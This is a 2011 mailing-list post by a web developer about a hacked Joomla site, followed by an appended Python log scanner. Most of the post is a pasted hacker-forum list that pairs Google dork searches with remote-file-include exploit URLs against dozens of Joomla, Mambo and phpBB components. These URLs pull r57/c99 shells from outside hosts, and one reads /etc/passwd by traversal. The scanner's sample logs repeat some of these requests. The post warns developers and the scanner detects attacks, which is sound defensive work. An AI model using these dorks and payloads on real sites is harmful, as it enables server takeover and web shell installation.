An interesting r57shell - c99shell exploit

Rudy Preston

Feb 2, 2011, 1:24:58 PM2/2/11
to joomla-...@googlegroups.com, joomla-de...@googlegroups.com, joomla-dev...@googlegroups.com
Hi All

Had a Joomla site on a shared server get hacked, and a folder ended up in the public root called "mnt".
If you didn't know Joomla, it would easily sit there in plain view.

Inside was a full package of tools for an r57shell and c99 shell setup:

http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell

With a neat little package of things that were then put into the code for the website using a module they created (not part of the original install) called "com_ccboard".
It was found in the "modules" folder. It also has code in the configuration.php file and in the index.php file of your template, in the footer.

The config file code was used to redirect Googlebots to pages on an external website but be indexed at the real site (it ended up being 25,100 linked pages).

The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the CSS).

The r57shell and c99shell contain a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data, then delete the table. The flat file was filled with links back to a download site the fake index used.

This sent me on a Google search to find out a few things. One of the first things I found out is that Google is a hacker's best friend.
But they also cache pages that need a login, so I was able to view hacker forum posts without having a login by viewing a search link
in Google via the "cached" link on Google search results.

Here is an example of what I found (if your component is on this list, I hope you study the r57 and c99 scripts to see how they can take over a server from your component):

And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that Joomla 1.5.16 caused a lot of back doors to close; it made a big ripple in the forums.

STAY UP TO DATE

Google search:
inurl: "com_flyspray"

exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00

exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard

exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"

exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"

exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"

exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"


exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"

exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar

exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"

exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"

exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"

exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"

exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"

exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess

exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"

exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"

exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"

exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"

exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"

exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"

exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"

exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"

exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?

Google search:

inurl: index.php? option = com_simpleboard


/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:

inurl: "com_hashcash"

CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?


Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?



Google search:
inurl: "com_forum"


/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: index.php? option = com_extcalendar


/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "minibb"


components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_pollxt"


/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_loudmounth"


/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_videodb"


/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: index.php? option = com_pcchess


/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_multibanners"


/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_a6mambohelpdesk"


/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?



Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php (you can search in this form ...)

usage: http://hedef/script/language/lang_en...t.com/c99.txt?



Powered phpMyAgenda


Code:

agenda.php3? rootagenda = Shell

agenda2.php3? rootagenda = Shell

inurl: agenda.php3


Excerpt:
agenda.php3? rootagenda = Shell


Calling code: Xero Portal v1.2




[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?


inurl: "fclick.php? fid"


show.php? path = http://muhacir.up.md/c99.txt?



show.php? path = http://muhacir.up.md/r57shell.txt?


Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability


http:// [target] / [path] / sipss ... s] = [SHELL]

For example:

/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x



**--Rudy--**
ethos7.com

Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com

joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7

wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress

Simplicity is the ultimate sophistication
--
Leonardo da Vinci
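Added example, not part of Rudy's post or of any of the projects it names: a small Python scanner that reads Apache combined-format access log lines and flags the request patterns the exploit list above relies on, namely a remote URL passed in mosConfig_absolute_path and the other include-path parameters quoted in the post, directory traversal with a trailing null byte, and register_globals-style overrides of GLOBALS and _REQUEST. The log lines, the client IPs and the host attacker.example are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path parameter names abused in the exploit URLs quoted in the post
# (lower-cased; the comparison below is case-insensitive).
RFI_PARAMS = {
    "mosconfig_absolute_path", "mosconfig_live_site", "absolute_path",
    "phpbb_root_path", "sbp", "rootagenda", "path", "config[sipssys]",
}

# A value that points the include at another host.
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Query names that try to overwrite PHP superglobals via register_globals.
SUPERGLOBAL = re.compile(
    r"^(globals|_(request|get|post|server|cookie|files|env|session))(\[|$)"
)

# Apache combined log format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic). Line 1 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2011:13:05:12 -0700] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8123
203.0.113.7 - - [02/Feb/2011:13:05:13 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.example/r57.jpg? HTTP/1.1" 200 312
203.0.113.7 - - [02/Feb/2011:13:05:14 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00 HTTP/1.1" 200 1821
203.0.113.7 - - [02/Feb/2011:13:05:15 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://attacker.example/r57.jpg?cmd=id HTTP/1.1" 500 0
198.51.100.9 - - [02/Feb/2011:13:06:01 -0700] "GET /index.php?option=com_sitemap&path=/images/stories HTTP/1.1" 200 4410
""".splitlines()


def analyze_request(target):
    """Return (rule, param, value) findings for one request target.

    parse_qsl percent-decodes names and values, so %00 arrives as "\\x00"
    and the '?' inside a remote URL value is kept (split is on the first '=').
    """
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        lname = name.lower()
        if lname in RFI_PARAMS and REMOTE_SCHEME.match(value):
            findings.append(("remote_file_include", lname, value))
        if SUPERGLOBAL.match(lname):
            findings.append(("superglobal_override", lname, value))
        if "../" in value or "..\\" in value:
            findings.append(("path_traversal", lname, value))
        if "\x00" in value:
            findings.append(("null_byte", lname, value))
    return findings


def scan_log(lines):
    """Parse log lines and return one alert dict per finding; unparseable lines are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule, param, value in analyze_request(m.group("target")):
            alerts.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "rule": rule,
                "param": param,
                "value": value,
                "status": int(m.group("status")),
            })
    return alerts


def top_sources(alerts):
    """Count alerts per client IP so the noisiest source is easy to spot."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ip"]} {a["rule"]:22} {a["param"]}={a["value"]!r} (HTTP {a["status"]})')
    print(top_sources(scan_log(SAMPLE_LOG)))
```

A 200 response on the remote-include or traversal lines is the case worth paging on: it means the component handed the attacker's URL to include() or read the file, which is exactly how the shells in the post get dropped. The underlying defect in these 1.0-era components is an include built from a variable that register_globals lets the request overwrite; the matching fix on the code side is the `defined('_VALID_MOS') or die(...)` guard at the top of every component file, register_globals (and Joomla's own emulation of it) turned off, and `allow_url_include` disabled in php.ini, with this kind of log check as the detection layer behind them.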

